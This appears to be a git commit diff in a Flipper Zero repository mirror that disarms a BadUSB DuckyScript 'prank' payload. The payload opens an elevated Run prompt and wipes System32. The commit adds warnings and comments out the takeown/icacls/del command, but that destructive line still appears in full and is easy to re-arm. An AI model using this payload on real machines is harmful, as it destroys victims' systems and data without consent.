mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 06:20:12 +00:00
Added bigger warning and "disarmed" script
This commit is contained in:
parent
88999b5c37
commit
ac7e4eadd4
@ -5,6 +5,11 @@ REM Props: Hak5, my friends and memes
|
|||||||
REM Version: 1.0
|
REM Version: 1.0
|
||||||
REM Category: Prank
|
REM Category: Prank
|
||||||
REM D as in DELETE! Deletes System32.
|
REM D as in DELETE! Deletes System32.
|
||||||
|
REM
|
||||||
|
REM THIS WILL DELETE THINGS AND MAKE COMPUTER UNHAPPY
|
||||||
|
REM Uncomment out the string below to arm the script.
|
||||||
|
REM Also... don't be a dick to n00bs. =)
|
||||||
|
REM
|
||||||
DELAY 500
|
DELAY 500
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
@ -13,5 +18,5 @@ CTRL-SHIFT ENTER
|
|||||||
DELAY 2000
|
DELAY 2000
|
||||||
ALT y
|
ALT y
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q *
|
REM STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q *
|
||||||
ENTER
|
ENTER
|
||||||
|
Loading…
Reference in New Issue
Block a user